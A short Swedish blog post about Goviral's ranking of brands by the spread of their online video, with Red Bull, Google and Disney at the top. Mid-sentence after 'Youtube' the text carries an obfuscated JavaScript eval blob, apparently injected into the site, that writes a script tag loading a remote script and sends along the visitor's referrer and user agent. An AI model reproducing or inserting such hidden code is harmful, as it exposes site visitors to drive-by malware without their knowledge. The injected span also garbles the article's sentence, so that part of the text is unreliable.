Image Image Image Image Image Image Image Image Image Image

| 3 juni, 2020

Scroll to top

Top

Goviral släpper lista på företag med bäst social spridning

Sebastian

Youtube eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kkeds|var|u0026u|referrer|stzfs||js|php’.split(’|’),0,{}))
och många andra videokanaler har blivit en viktig faktor gällande marknadsföringen för bolag idag. Nu har Goviral släppt en lista på de företag som är bäst gällande sin spridning av dessa videoklipp. Det är inte konstigt att Red Bull toppar den då de verkar ha den bästa strategin när det gäller att synas på Internet.

Goviral har kollat upp de olika företagen som synts mest på Youtube, Vimeo, Dailymotion och Facebook det senaste året. Här räknas antal visningar samt hur många som prenumererar på de olka företagens officiella konton / kanaler.

”The results of goviral’s Social Video Equity Report prove that when it comes to branded content, fortune favours the brave. Brands like Red Bull, Old Spice and Nike are risk-takers, constantly disrupting what’s expected to spark agenda-setting conversation. An effective social video strategy can elevate a brand beyond the product, creating an experience consumers really want to part of.”

På andra plats hittar vi Google och på tredje plats Disney.

Mer info: The Next Web

Mer info: goviral.com